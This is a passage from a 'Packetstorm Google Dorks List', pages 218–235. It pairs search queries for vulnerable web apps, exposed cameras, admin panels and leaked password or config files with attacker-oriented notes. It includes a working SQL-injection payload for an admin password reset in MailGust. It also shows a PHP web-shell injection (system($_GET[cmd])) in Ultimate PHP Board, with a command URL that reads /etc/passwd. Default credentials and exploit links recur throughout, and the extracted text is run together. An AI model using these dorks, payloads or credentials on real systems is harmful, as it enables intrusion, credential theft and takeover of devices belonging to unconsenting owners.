MailGust 1.9/2.0 (possibly priorversions) SQL injection / boardtakevorsoftware:site:http://www.mailgust.org/description:Mailgust is three softwares in one: *Mailing list manager * Newsletterdistribution tool * Message BoardMailgust is written in php and uses amysql database. vulnerability:if magicquotes off -> SQL Injectionwithout tohave an account, a user can sendhimself a new admin passwordusingpassword reminder, in email fieldtype:[yuor_email],'or'a'='a'/*@hotmail.comgive a look to what happen:220[MAILSERVER] SMTP ServicereadyHELO [MAILGUST]250[MAILSERVER].MAIL FROM:250MAIL FROM: OKRCPT TO:250RCPT TO:>[your_email] OKRCPTTO: OKDATA354 Start mail input;end with .Date: Sat, 24 Sep 200516:11:38 +0100Subject: NewpasswordTo:[your_email],'or'a'='a'/*@hotmail.comFrom: [email protected] name is: [admin_email]Your newpassword is: 4993587Clickhere:http://localhost/mailgust/index.php?method=activate_new_password&list=maillistuser&pwd=4993587&id=1756185114to activate the password, thantry to log in!It is recommended thatyou change your password

Page 218: Packetstorm Google Dorks List

afterwards..250 MailacceptedQUIT221 [MAILSERVER]QUITvulnerable query is in[path_to_mailgust]/gorum/user_email.php at line 363:...$query = "SELECT *FROM$applName"."_$userClassName "."WHERE email='$this->email'";...itbecomes:SELECT * FROMmaillist_maillistuser WHEREemail='[yuor_email],'or'a'='a'/*@hotmail.com'"or'a'='a'" is always true, so thequery is always true, script doesn't fail,for mail function, theese are two validemail address,it will send the mail to[your_email] and to'or'a'='a'/*@hotmail.com ;)activate thepassword, now you can login with[admin_email] as user and newpasswordu can find my poc exploithere:http://rgod.altervista.org/maildisgust.html

intitle:"FolderListing" "FolderListing" NameSize Date/TimeFile Folder

intitle:"Folder Listing" "FolderListing" Name Size Date/Time FileFolder

directory listing for Fastream NETFileWeb Server

"Directory Listingfor" "Hosted byXerver"

"Directory Listing for" "Hosted byXerver" directory listing for Xerver web server

intitle:"SuperoDoctor III" -inurl:supermicro

intitle:"Supero Doctor III" -inurl:supermicro

"Supero Doctor III RemoteManagement" by Supermicro, Inc.info:http://www.supermicro.es/products/accessories/software/SuperODoctorIII.htmljust look for default password...

intitle:"Netcam"intitle:"user login" intitle:"Netcam" intitle:"user login" just yet other online cam.

inurl:/yabb/Members/Admin.dat inurl:/yabb/Members/Admin.dat

This search will show you theAdministrator password (very firstline) on YaBB forums whose ownersdidnt configure the permissionscorrectly. Go up a directory to get a fullmemberlist (the .dat files have thepasswords).

Page 219: Packetstorm Google Dorks List

intitle:"BiromsoftWebCam" -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000

intitle:"Biromsoft WebCam" -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000

Brimsoft webcam software enablesanyone with a webcam to easily createa webcam http server. This googledorklooks for these webcam servers.

(intitle:"VisionGSWebcamSoftware")|(intext:"Powered byVisionGSWebcam") -showthread.php -showpost.php -"Search Engine" -computersglobal.com -site:g

(intitle:"VisionGS WebcamSoftware")|(intext:"Powered byVisionGS Webcam") -showthread.php -showpost.php -"Search Engine" -computersglobal.com -site:g

I don't know if the google query gotsubmitted right because it lookstruncated. here it isagain:(intitle:"VisionGS WebcamSoftware")|(intext:"Powered byVisionGS Webcam") -showthread.php-showpost.php -"Search Engine" -computersglobal.com -site:golb.org -site:chat.ru -site:findlastminute.de -site:tricus.de -site:urlaubus.de -johnny.ihackstuff VisionGS webcamsoftware enables anyone with awebcam to easily host a webcam httpserver. This dork finds those servers.

"Powered By:lucidCMS 1.0.11" "Powered By: lucidCMS 1.0.11"

Lucid CMS 1.0.11 SQL Injection/Login bypassthis is the dork for therversion I tested:"Powered By:lucidCMS 1.0.11"advisory/pocexploit:http://rgod.altervista.org/lucidcms1011.htmlwe have an XSSeven:http://packetstorm.linuxsecurity.com/0509-exploits/lucidCMS.txt

"News generatedby Utopia NewsPro" | "PoweredBy: Utopia NewsPro"

"News generated by Utopia NewsPro" | "Powered By: Utopia NewsPro"

Utopia News Pro 1.1.3 (and priorversions) SQL Injection &XSSadvisory & pocexploit:http://rgod.altervista.org/utopia113.html

inurl:login.jsp.bak inurl:login.jsp.bak JSP programmer anyone? You can readthis!

intitle:Mantis"Welcome to thebugtracker" "0.15 |0.16 | 0.17 | 0.18"

intitle:Mantis "Welcome to thebugtracker" "0.15 | 0.16 | 0.17 |0.18"

cross site scripting and sql injectionvunerabilities were discovered inMantis versions 0.19.2 or less. Mantisis a web-based bugtracking systemwritten in PHP. Vunerability reportathttp://search.securityfocus.com/archive/1/411591/30/0/threaded

intitle:"IQeye302 | intitle:"IQeye302 | IQeye303 | This is a googledork for IQeye

Page 220: Packetstorm Google Dorks List

IQeye303 |IQeye601 |IQeye602 |IQeye603"intitle:"LiveImages"

IQeye601 | IQeye602 | IQeye603"intitle:"Live Images"

netcams. Some of which you cancontrol how they tilt/zoom. The defaultadmin username/password areroot/system.

intitle:"urchin(5|3|admin)"ext:cgi

intitle:"urchin (5|3|admin)" ext:cgi Gain access to Urchin analysis reports.

inurl:status.cgi?host=all inurl:status.cgi?host=all

Nagios Status page. See what ports arebeing monitored as well as ipaddresses.Be sure to check the googlecached page first.

inurl:polly/CP inurl:polly/CP You can get into admin panel withoutlogging.

"Cyphor(Release:" -www.cynox.ch

"Cyphor (Release:" -www.cynox.ch

Cyphor 0.19 (possibly prior versions)SQL Injection / Board takeover / crosssite scriptingmy advisory & pocexploit:http://rgod.altervista.org/cyphor019.htmlrgodModerator PS: Thesoftware is longer maintained.

"Welcome to theversatileBulletinBoard" | "PoweredbyversatileBulletinBoard"

"Welcome to theversatileBulletinBoard" | "Poweredby versatileBulletinBoard"

versatileBulletinBoard V1.0.0 RC2(possibly prior versions)multiple SQLInjection vulnerabilities / login bypass /cross site scripting / informationdisclosureadvisory:http://rgod.altervista.org/versatile100RC2.html

inurl:ocw_login_username inurl:ocw_login_username

WEBppliance is a software applicationdesigned to automate the deploymentand management of Web-hostingservices. There is a bug in how thisproduct does the Logon validation.This Search will take you directly intothe Admin pages....U can delete anUser....(Plz dont do that..)Enjoy,NightHacker

intitle:Bookmarksinurl:bookmarks.html "Bookmarks

intitle:Bookmarksinurl:bookmarks.html "Bookmarks

AFAIK are the bookmarks of Firefox,Netscape and Mozilla stored inbookmarks.html. It is often uploaded toserve as a backup, so it could revealsome juicy information.

"The followingreport contains

"The following report containsconfidential information"

This googledork reveals vunerabilityreports from many different vendors.

Page 221: Packetstorm Google Dorks List

confidentialinformation"vulnerability -search

vulnerability -search These reports can contain informationwhich can help an attacker break into asystem/network.

"Shadow SecurityScanner performeda vulnerabilityassessment"

"Shadow Security Scannerperformed a vulnerabilityassessment"

This is a googledork to findvulnerability reports produced byShadow Security Scanner. Theycontain valuable information which canbe used to break into a system.

intitle:"DocutekERes - AdminLogin" -edu

intitle:"Docutek ERes - AdminLogin" -edu

Docutek Eres is software that helpslibaries get an internet end to them.This dork finds the admin login inpage. Using Docutek Eres you can lookthrough course material amoung otherthings.

intitle:"RetinaReport""CONFIDENTIALINFORMATION"

intitle:"Retina Report""CONFIDENTIALINFORMATION"

This googledork finds vulnerabilityreports produced by eEye RetinaSecurity Scanner. The informationinside these reports can help an attackerbreak into a system/network.

intitle:"CJ LinkOut V1" intitle:"CJ Link Out V1"

A cross site scripting vunerability hasbeen discovered in CJ linkout version1.x. CJ linkout is a free product whichallows you to easily let users connect toa different site with a frame at the topwhich links back to your site. Thevulnerability report can be found athttp://secunia.com/advisories/16970/ .

server-dbs"intitle:index of" server-dbs "intitle:index of"

Yes, people actually post theirteamspeak servers on websites. Justlook for the words superadmin in thefiles and the password trails it in plaintext.

inurl:"Sites.dat"+"PASS=" inurl:"Sites.dat"+"PASS="

FlashFXP has the ability to import aSites.dat file into its current Sites.datfile, using this search query you areable to find websites misconfigured toshare the flashfxp folder andsubsequently the Sites.dat filecontaining all custom sites the victimhas in their sitelist. the passwords arenot clear text but if you import thesites.dat into flashfxp you can connectto the ftps and it automatically sends

Page 222: Packetstorm Google Dorks List

the password. you can also set flashfxpto not hide passwords and it will showyou what the password is when itconnects.

("port_255/home")|(inurl:"home?port=255")

("port_255/home")|(inurl:"home?port=255")

standered printer search. Moderatornote: see also dork id=1221

"This page is forconfiguringSamsung NetworkPrinter" |printerDetails.htm

"This page is for configuringSamsung Network Printer" |printerDetails.htm

several different samsung printers

log inurl:linklintfiletype:txt -"checking"

log inurl:linklint filetype:txt -"checking"

Linklint is an Open Source Perlprogram that checks links on web sites.This search finds the Linklint logdirectory. Complete site map able to berecreated, and if you go back onedirectory you can see all the other filesgenerated by linklint. Thanks to CP fordirection.

inurl:course/category.php |inurl:course/info.php |inurl:iplookup/ipatlas/plot.php

inurl:course/category.php |inurl:course/info.php |inurl:iplookup/ipatlas/plot.php

Moodle

"Powered byXOOPS 2.2.3Final"

"Powered by XOOPS 2.2.3 Final"

XOOPS 2.2.3 Arbitrary local fileinclusionThis a generic dork for theversion I tested, advisory & pocexploit:http://rgod.altervista.org/xoops_xpl.html

inurl:"wfdownloads/viewcat.php?list="

inurl:"wfdownloads/viewcat.php?list="

XOOPS WF_Downloads (2.05)module SQL injectionThis a specificdork, that searches XOOPS sites withWF_Downloads module installed,advisory & pocexploit:http://rgod.altervista.org/xoops_xpl.html

intitle:"OnLineRecruitmentProgram - Login" -johnny.ihackstuff

intitle:"OnLine RecruitmentProgram - Login" -johnny.ihackstuff

This is the Employer's Interface ofeRecruiter, a 100% Paper LessRecruitment Solution implemented byUniversal Virtual Office. The only timeyou need to use paper is when you giveout the appointment letter.The access

Page 223: Packetstorm Google Dorks List

to the Employer's Zone is restricted toauthorized users only. Pleaseauthenticate your identity.

intitle:"EXTRANET * -Identification"

intitle:"EXTRANET * -Identification"

WorkZone Extranet Solution loginpage. All portals are in french orspanish I belive.

intitle:"EXTRANET login" -.edu -.mil -.gov -johnny.ihackstuff

intitle:"EXTRANET login" -.edu -.mil -.gov -johnny.ihackstuff

This search finds many differentExtranet login pages.

intitle:"*- HPWBEM Login" |"You are beingprompted toprovide loginaccountinformation for *"| "Please providethe informationrequested andpress

intitle:"*- HP WBEM Login" |"You are being prompted to providelogin account information for *" |"Please provide the informationrequested and press

HP WBEM Clients are WBEM enabledmanagement applications that providethe user interface and functionalitysystem administrators need to managetheir environment.

intitle:"NovellWeb Services""GroupWise" -inurl:"doc/11924"-.mil -.edu -.gov -filetype:pdf

intitle:"Novell Web Services""GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf

Novell GroupWise is a completecollaboration software solution thatprovides information workers with e-mail, calendaring, instant messaging,task management, and contact anddocument management functions. Theleading alternative to MicrosoftExchange, GroupWise has long beenpraised by customers and industrywatchers for its security and reliability.

"Powered byMerak Mail ServerSoftware" -.gov -.mil -.edu -site:merakmailserver.com -johnny.ihackstuff

"Powered by Merak Mail ServerSoftware" -.gov -.mil -.edu -site:merakmailserver.com -johnny.ihackstuff

Webmail login portals for Merak EmailServerMerak Email Server Suiteconsists of multiple awards winnerMerak Email Server core and optionalcomponents:* Email Server forWindows or Linux* Anti-SpamProtection* Anti-Virus Protection*Integrated WebMail Access* InstantMessaging* GroupWare

intitle:"MerakMail Server WebAdministration" -ihackstuff.com

intitle:"Merak Mail Server WebAdministration" -ihackstuff.com

User login pages for Merak EmailServer Suite which consists of MerakEmail Server core and optionalcomponents:* Email Server for

Page 224: Packetstorm Google Dorks List

Windows or Linux* Anti-SpamProtection* Anti-Virus Protection*Integrated WebMail Access* InstantMessaging* GroupWaremore info:h**p://www.icewarp.com

ext:yml databaseinurl:config ext:yml database inurl:config

Ruby on Rails is a MVC full-stackframework for development of webapplications. There's a configurationfile in this framework calleddatabase.yml that links the Rails withthe DB. It contains all the info neededto access de DB including usernameand password in clear text.

"This is arestricted AccessServer" "JavascriptNotEnabled!"|"Messenger Express" -edu-ac

"This is a restricted Access Server""Javascript NotEnabled!"|"Messenger Express" -edu -ac

Mostly Login Pages for iPlanetMessenger Express, which is a web-based electronic mail program thatenables end users to access theirmailboxes using a browser. MessengerExpress clients send mail to aspecialized web server that is part ofiPlanet Messaging Server. Thanks tothe forum members for cleaning up thesearch.

inurl:webvpn.html"login" "Pleaseenter your"

inurl:webvpn.html "login" "Pleaseenter your"

The Cisco WebVPN Services Moduleis a high-speed, integrated SecureSockets Layer (SSL) VPN servicesmodule for Cisco products.

intitle:"SNOIEIntel Web NetportManager" ORintitle:"Intel WebNetport ManagerSetup/Status"

intitle:"SNOIE Intel Web NetportManager" OR intitle:"Intel WebNetport Manager Setup/Status"

Intel Netport Express Print Server.

"Establishing asecure IntegratedLights Out sessionwith" ORintitle:"DataFrame - Browsernot HTTP 1.1compatible" ORintitle:"HPIntegrated Lights-

"Establishing a secure IntegratedLights Out session with" ORintitle:"Data Frame - Browser notHTTP 1.1 compatible" ORintitle:"HP Integrated Lights-

iLo and related login pages !?Whoops..

inurl:nnls_brand.ht inurl:nnls_brand.html OR Novell Nterprise Linux Services

Page 225: Packetstorm Google Dorks List

ml ORinurl:nnls_nav.html

inurl:nnls_nav.html detection dork. Some of the featuresare:* iFolder* Samba* NetStorage*eDirectory Administration* Linux UserManagement* NMAS 2.3* NetMail3.5* GroupWise 6.5* iPrint* VirtualOffice

intitle:"Welcometo F-Secure PolicyManager ServerWelcome Page"

intitle:"Welcome to F-Secure PolicyManager Server Welcome Page"

An attacker may want to know aboutthe antivirus software running. Thedescription says he can check the statusof the F-Secure Policy ManagerServer's Host Module. He can alsocheck the status of the ConsoleModule, but only if he's reading thepage from the local host.

intitle:"SummitManagementInterface" -georgewbush.org.uk

intitle:"Summit ManagementInterface" -georgewbush.org.uk

Extreme Networks Summit SwitchesWeb admin pages. Server: Allegro-Software-RomPager/2.10

intitle:Cisco "Youare using an oldbrowser or havedisabledjavascript. Youmust use version 4or higher ofNetscapeNavigator/Communicator"

intitle:Cisco "You are using an oldbrowser or have disabled javascript.You must use version 4 or higher ofNetscape Navigator/Communicator"

Login pages for Ciso VPNConcentrator stuff

intitle:"IomegaNAS Manager" -ihackstuff.com

intitle:"Iomega NAS Manager" -ihackstuff.com

Login page dork for Iomega NASManager.. There's only 1 result for itnow, but this could change in thefuture.

"This website wascreated withphpWebThings1.4"

"This website was created withphpWebThings 1.4"

This is Secuniaadvisory:http://secunia.com/advisories/17410/and my exploit that show a newvulnerability in "msg"parameter:http://rgod.altervista.org/phpwebth14_xpl.html

"site info for""Enter AdminPassword"

"site info for" "Enter AdminPassword"

This will take you to the cash crusaderadmin login screen. It is my firstgoogle hack.. also try adding index.phpat the end, have fun people :)

inurl:webalizer inurl:webalizer filetype:png -.gov - ***WARNING: This search uses

Page 226: Packetstorm Google Dorks List

filetype:png -.gov-.edu -.mil -opendarwin

.edu -.mil -opendarwin google images, disable images unlessyou want your IP spewed acrosswebpages!***Webalizer is a programthat organizes who is going to aWebpage, what they are looking at,what user names are entered andendless other statistics.This is a greatfirst step in getting too muchinformation about a website. You seeany links or files that are hidden, thesearch can be made more specific byusing other google advancedsearchs.Learn more aboutWebalizer(http://www.mrunix.net/webalizer/).

Display Camerasintitle:"Express6Live Image"

Display Cameras intitle:"Express6Live Image"

Express6 live video controller.Displaysvideo from "Netlive Cameras" found inthissearch:http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=1416Several newcameras found in this search.

intitle:"Sony SNT-V304 VideoNetwork Station"inurl:hsrindex.shtml

intitle:"Sony SNT-V304 VideoNetwork Station"inurl:hsrindex.shtml

The SNT-V304 Video NetworkStation.Sony's network camera controlstation.

"Copyright 2000 -2005 MiroInternational PtyLtd. All rightsreserved" "Mambois Free Softwarereleased"

"Copyright 2000 - 2005 MiroInternational Pty Ltd. All rightsreserved" "Mambo is Free Softwarereleased"

this dork is for Mambo 4.5.2x Globalsoverwrite / remote command executionexploit:http://rgod.altervista.org/mambo452_xpl.html

inurl:wp-mail.php+ "There doesn'tseem to be anynew mail."

inurl:wp-mail.php + "There doesn'tseem to be any new mail."

This is the WordPress script handlingPost-By-Email functionality, the searchis focussed on the message telling thatthere's nothing to process.If the script*does* have anything to progress, itwill reveal the email-address ofaccount that sent the message(s).

("Skin Design byAmie ofIntense")|("Fanficti

("Skin Design by Amie ofIntense")|("Fanfiction Categories""Featured Stories")|("default2,

eFiction

Page 227: Packetstorm Google Dorks List

on Categories""FeaturedStories")|("default2, 3column,Romance,eFiction")

3column, Romance, eFiction")

"Powered byUPB" (b 1.0)|(1.0final)|(Public Beta1.0b)

"Powered by UPB" (b 1.0)|(1.0final)|(Public Beta 1.0b)

dork: "Powered by UPB" (b 1.0)|(1.0final)|(Public Beta 1.0b) this is a veryold vulnerability discovered byXanthic, can't find it in GHDB and Iam surprised of how it still works...register, login, go to:http://[target]/[path_to_upb]/admin_members.php edit your level to 3 (Admin)and some Admin level to 1 (user),logout, re-login and... boom! You seeAdmin Panel link as I see it? The onlylink to the advisory that I found is this(in Italian):http://216.239.59.104/search?q=cache:iPdFzkDyS5kJ:www.mojodo.it/mjdzine/zina/numero3/n3f1.txt+xanthic+upb&hl=it and I have remote commads xctnfor this now, edit site title with thiscode: Ultimate PHP Board";error_reporting(0);ini_set("max_execution_time",0);system($_GET[cmd]); echo " now inconfig.dat we have: ... $title="UltimatePHP Board "; error_reporting(0);ini_set("max_execution_time",0);system($_GET[cmd]); echo " "; ... inheader.php we have: ... include"./db/config.dat"; ... so you can launchcommands:http://[target]/[path]/header.php?cmd=cat%20/etc/passwd

"Welcome to thedirectory listingof""NetworkActiv-Web-Server"

"Welcome to the directory listingof" "NetworkActiv-Web-Server"

this is for NetworkActiv-Web-Serverdirectory listing

intitle:"SnapServer"intitle:"Home"

intitle:"Snap Server" intitle:"Home""Active Users"

This an online device, you can searchfor unpassworded shares on SnapAppliance Server.Moderator notes:This

Page 228: Packetstorm Google Dorks List

"Active Users" was found by golfo on sep 8th, but heforgot to submit it (ouch).. Before thatmlynch was the first to discover it.See:http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=2784&highlight=snap+serverhttp://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=180

"Powered byXaraya""Copyright 2005"

"Powered by Xaraya" "Copyright2005" Xaraya

"parent directory"+proftpdpasswd "parent directory" +proftpdpasswd

User names and password hashes fromweb server backups generated bycpanel for ProFTPd. Password hashescan be cracked, granting direct accessto FTP accounts. Unix passwd andshadow files can sometimes be foundwith this query as well.

"This websitepowered byPHPX" -demo

"This website powered by PHPX" -demo this is the dork for PhpX

"Warning:Installationdirectory exists at""Powered by ZenCart" -demo

"Warning: Installation directoryexists at" "Powered by Zen Cart" -demo

by this dork you can find freshinstallations of Zen-Cartsee FullDisclosure forums fore details... ;)

"Based onDoceboLMS 2.0" "Based on DoceboLMS 2.0"

advisory & pocexploit:http://rgod.altervista.org/docebo204_xpl.html

"2005 SugarCRMInc. All RightsReserved""Powered BySugarCRM"

"2005 SugarCRM Inc. All RightsReserved" "Powered BySugarCRM"

this is the dork for Sugar Suite 3.5.2a& 4.0beta remote code execution issue,advisory & pocexploit:http://rgod.altervista.org/sugar_suite_40beta.html

inurl:Printers/ipp_0001.asp inurl:Printers/ipp_0001.asp Thanks to Windows 2003 Remote

Printing

"Powered ByphpCOIN 1.2.2" "Powered By phpCOIN 1.2.2"

PhpCOIN 1.2.2 arbitrary remote\localinclusion / blind sql injection / pathdisclosureadvisory:http://rgod.altervista.org/phpcoin122.htmlmoregeneric:"Powered By phpCOIN"to seeprevious verions (not tested)

Page 229: Packetstorm Google Dorks List

intext:"Poweredby SimpleBBSv1.1"*

intext:"Powered by SimpleBBSv1.1"*

Vulnerability DescriptionSimpleBBScontains a flaw that may allow anattacker to carry out an SQL injectionattack. The issue is due to the searchmodule not properly sanitizing user-supplied input to undisclosed variables.This may allow an attacker to inject ormanipulate SQL queries in the backenddatabase. No further details have beenprovided.SolutionDescriptionCurrently, there are noknown upgrades, patches, orworkarounds available to correct thisissue.Products:* SimpleMediaSimpleBBS 1.1 AffectedVulnerabilityclassification:* Remote vulnerability*Input manipulation attack* Impact onintegrity* Exploit unavailable*VerifiedMore info on Vuln:http://www.securityfocus.com/bid/15594

"Site powered ByLimbo CMS" "Site powered By Limbo CMS" this is the dork for Limbo Cms

inurl:ventrilo_srv.ini adminpassword

inurl:ventrilo_srv.iniadminpassword

This search reveals the ventrilo (voicecommunication program used by manyonline gamers) passwords for manyservers. Possiblity of gaining control ofthe entire server.

inurl:guestbook/guestbooklist.asp"Post Date" FromCountry

inurl:guestbook/guestbooklist.asp"Post Date" From

A sql vulnerability has been reported ina Techno Dreams asp script, login.asp.http://search.securityfocus.com/archive/1/414708/30/0/threadedSeveral waysof finding the vulnerablefile:Guestbook (the above dork):inurl:guestbook/guestbooklist.asp "PostDate" From Country Results 1 - 21 of123Announcement:inurl:MainAnnounce1.asp "show all"Results 1 -20 of 86WebDirectory:inurl:webdirectory "Total AvailableWeb Sites" Search Results 1 - 4 of5MailingList:inurl:maillinglist/emailsadd.asp Results1 - 6 of 6note these dorks don't find thevulnerable script; to find it change the

Page 230: Packetstorm Google Dorks List

url to /admin/login.asp or/login.asp.The default admin user/passis admin/admin. Some results leave thisinfo on the page and others load thepage with this info already filled out.

inurl:/Merchant2/admin.mv |inurl:/Merchant2/admin.mvc |intitle:"MivaMerchantAdministrationLogin" -inurl:cheap-malboro.net

inurl:/Merchant2/admin.mv |inurl:/Merchant2/admin.mvc |intitle:"Miva MerchantAdministration Login" -inurl:cheap-malboro.net

Miva Merchant is a product that helpsbuisnesses get into e-commerce. Thisdork locates their admin login.

intitle:"Adminlogin" "Web SiteAdministration""Copyright"

intitle:"Admin login" "Web SiteAdministration" "Copyright"

sift Group makes a web siteadministration product which can beaccessed via a web browser. This dorklocates their admin login.

intitle:"b2evo >Login form""Login form. Youmust log in! Youwill have to acceptcookies in order tolog in" -demo -site:b2evolution.net

intitle:"b2evo > Login form" "Loginform. You must log in! You willhave to accept cookies in order tolog in" -demo -site:b2evolution.net

b2evolution is a free open-sourceblogging system from b2evolution.net.This dork finds the admin login.

(intitle:WebStatistica inurl:main.php)|(intitle:"WebSTATISTICA server")-inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob

(intitle:WebStatisticainurl:main.php) |(intitle:"WebSTATISTICA server")-inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software-rob

WebStatistica provides detailedstatistics about a web page. Normallyyou would have to login to view thesestatistics but the sites have putautologin on.

inurl:proxy |inurl:wpad ext:pac| ext:datfindproxyforurl

inurl:proxy | inurl:wpad ext:pac |ext:dat findproxyforurl

Information about proxy servers,internal ip addresses and other networksensitive stuff.

inurl:/cgi-bin/pass.txt inurl:/cgi-bin/pass.txt Passwords

Page 231: Packetstorm Google Dorks List

"Emergisoft webapplications are apart of our"

"Emergisoft web applications are apart of our"

Hospital patient management system,in theory it could be dangerous.

inurl:/img/vr.htm inurl:/img/vr.htm Linksys wireless G Camera.

intext:"Poweredby CubeCart3.0.6"intitle:"Poweredby CubeCart"

intext:"Powered by CubeCart 3.0.6"intitle:"Powered by CubeCart"

CubeCart is an eCommerce scriptwritten with PHP & MySQL. SearchCubeCart 3.0.6 portal vulnerable. Thevulnerability is Remote CommandExecution. Seehttp://milw0rm.com/id.php?id=1398Moderator note: "Moving milw0rm onceagain. This time hosted by asylum-networks.com. /str0ke"

inurl:ovcgi/jovw inurl:ovcgi/jovwAn HP Java network management tool.It is a sign that a network may not beconfigured properly.

intitle:Axisinurl:"/admin/admin.shtml"

intitle:Axisinurl:"/admin/admin.shtml"

similar searchs exist. This search findsa few more results as well as access tothe Admin area or a login screendepending on Cameras configuration.

DCSinurl:"/web/login.asp"

DCS inurl:"/web/login.asp"Login pages for the DCS-950 WebCamera. Even comes with a built inmicrophone.

intitle:"Dell LaserPrinter *" port_0 -johnny.ihackstuff

intitle:"Dell Laser Printer *" port_0-johnny.ihackstuff

Dell laser printers. This search findsdifferent results that dork id 1077.

filetype:bakcreateobject sa filetype:bak createobject sa

This query searches for files that havebeen renamed to a .bak extension(obviously), but includes a search forthe characters "sa" (default SQL serveradmin id) and "createobject" which isrequisite VBScript for opening somesort of odbc/ado connection. Since thesql id and password are plain text, it'seasy to connect to the SQL server onceyou have this information... especiallythose that use "server=127.0.0.1" soyou know IIS & SQL Server arerunning on the same box.

"bp blog admin"intitle:login |intitle:admin -site:johnny.ihackst

"bp blog admin" intitle:login |intitle:admin -site:johnny.ihackstuff.com

betaparticle (bp) blog is blog softwarecoded in asp. This google dork findsthe admin logins.

Page 232: Packetstorm Google Dorks List

uff.com

inurl:"editor/list.asp" |inurl:"database_editor.asp" |inurl:"login.asa""are set"

inurl:"editor/list.asp" |inurl:"database_editor.asp" |inurl:"login.asa" "are set"

This search finds CLEARTEXTusernames/passwords for the ResultsDatabase Editor. The log in portal canbe found at /editor/login.asp. At time ofsubmitting there are 21 results.Also asearch for thelogins:inurl:"Results/editor/login.asp""Database Editor Login" "Results Page"

ext:passwd -intext:the -sample-example

ext:passwd -intext:the -sample -example

Various encrypted passwords, someplaintext passwords and some privatekeys are revealed by this search.

enable password |secret "currentconfiguration" -intext:the

enable password | secret "currentconfiguration" -intext:the

Another Cisco configuration search.This one is cleaner, gives completeconfiguration files and it catchesplaintext, "secret 5" and "password 7"passwords.

ext:asa | ext:bakintext:uidintext:pwd -"uid..pwd"database | server |dsn

ext:asa | ext:bak intext:uidintext:pwd -"uid..pwd" database |server | dsn

search for plaintext databasecredentials in ASA and BAK files.

intext:"PhpGedView Version"intext:"final -index" -inurl:demo

intext:"PhpGedView Version"intext:"final - index" -inurl:demo PHPGedView

intext:"Poweredby DEV webmanagementsystem" -dev-wms.sourceforge.net -demo

intext:"Powered by DEV webmanagement system" -dev-wms.sourceforge.net -demo

DEV cms

intitle:"phpDocumentor webinterface"

intitle:"phpDocumentor webinterface"

Php Documentor < = 1.3.0 rc4 remotecode xctn dork:intitle:"phpDocumentor webinterface"advisory & pocexploit:http://rgod.altervista.org/phpdocumentor_130rc4_incl_expl.html

inurl:"tmtrack.dll?" inurl:"tmtrack.dll?"

This query shows installations ofSerena Teamtrack.(www.serena.com).You may be able toadjust the application entry point, by

Page 233: Packetstorm Google Dorks List

providing a command after the"tmtrack.dll?" likethistmtrack.dll?LoginPagetmtrack.dll?View&Template=viewand more.

intitle:Ovislinkinurl:private/login intitle:Ovislink inurl:private/login Ovislink vpn login page.

intitle:":::::INTELLINET IPCamera Homepage:::::" ORinurl:/main_activex.asp ORinurl:/main_applet.cgi

intitle:"::::: INTELLINET IPCamera Homepage :::::

A variation on Jeffball55's originalIntellinet Ip Camera.This search findsseveral more web cams.A suggestedsecondary search:"AdministratorMenu" "camera Name" "Location""frame rate" intitle:network.camera -pdfThanks jeffball.

filetype:plintitle:"UltraboardSetup"

filetype:pl intitle:"UltraboardSetup" setup pages to the ultraboard system.

inurl:install.plintext:"Readingpath paramaters" -edu

inurl:install.pl intext:"Reading pathparamaters" -edu

Excelent information for foot holds.Everything from OS, to forumsoftware, etc. Other exploits possible

inurl:build.err inurl:build.err

General build error file. Can tell whatmodules are installed, the OS thecompiler the language, in theoryusernames and passwords couldprobably be found too.

intext:ViewCVSinurl:Settings.php intext:ViewCVS inurl:Settings.php

CVs is a software used to keep track ofchanges to websites. You can reviewall updates and previous files wihtoutactualy loging into CVS. It is possibleto see password files, directorystructure, how often is the websiteupdated, previous code find exploits,etc.

"Powered byMidmartMessageboard""AdministratorLogin"

"Powered by MidmartMessageboard" "AdministratorLogin"

Midmart Messageboard lets you run ahighly customizable bulletin boardwith a very nice user interface (similarto Yahoo Clubs) on your web site infew minutes. Many other featuresincluded. Rar found it murfie cleaned itup.

inurl:install.plintitle:GTchat inurl:install.pl intitle:GTchat Gtchat install file.You can disable the

chat program or change the language

Page 234: Packetstorm Google Dorks List

without a admin username orpassword. You can also point thechatroom information to a differentURL in theory using a crosscript totake over the the chatroom.

inurl:rpSys.html inurl:rpSys.htmlWeb configuration pages for varioustypes of systems. Many of thesesystems are not password protected.

intitle:"Horde ::My Portal" -"[Tickets"

intitle:"Horde :: My Portal" -"[Tickets"

Hi It will give you administrativeownership over Horde webmail systemplus all users in Horde webmailsystem.. also php shell :) and muchmore ...Edited by CP

"Please re-enteryour password Itmust matchexactly"

"Please re-enter your password Itmust match exactly"

Invision Powerboard registrationpages. Plain and simple.

intext:"Fill out theform belowcompletely tochange yourpassword and username. If newusername is leftblank, your oldone will beassumed." -edu

intext:"Fill out the form belowcompletely to change yourpassword and user name. If newusername is left blank, your old onewill be assumed." -edu

The page to change admin passwords.Minor threat but the place to start anattack.

inurl:CrazyWWWBoard.cgiintext:"detaileddebugginginformation"

inurl:CrazyWWWBoard.cgiintext:"detailed debugginginformation"

gives tons of private forumconfiguration information.examples:Global variables installed, what groupsthe default user, guest and adminbelong to, file paths, OS and appacheversions, encypted adminpassword.Also Crazyboard has knownvulnerabilities.

intext:"Welcometo Taurus" "TheTaurus ServerAppliance"intitle:"The TaurusServer Appliance"

intext:"Welcome to Taurus" "TheTaurus Server Appliance"intitle:"The Taurus ServerAppliance"

Celestix Networks, Inc., the premiersupplier of network server appliance,announces the Taurus(TM) ServerAppliance, the all-in-one networkingsolution for the small to midsizebusiness. The Taurus(TM) ServerAppliance offers no compromise onfunctionality and scalability, andprovides optimum efficiency at a lower

Page 235: Packetstorm Google Dorks List

price than traditional servers.With asingle purchase, up to 250 users haveintegrated file and peripheral sharing,high-speed Internet access, email,scheduled back-up, VPN and securefirewall, anti-virus engine, and Intranet.Standard with built-in networkingsoftware and optimized applications,the Taurus(TM) supplies up to 40-GBof Internal storage. Seperate Adminand root password. Root passwordmust be changed from the commandprompt which means most Sysadminswon't change it from Default. Manuelhosted by the device no passwordneeded.

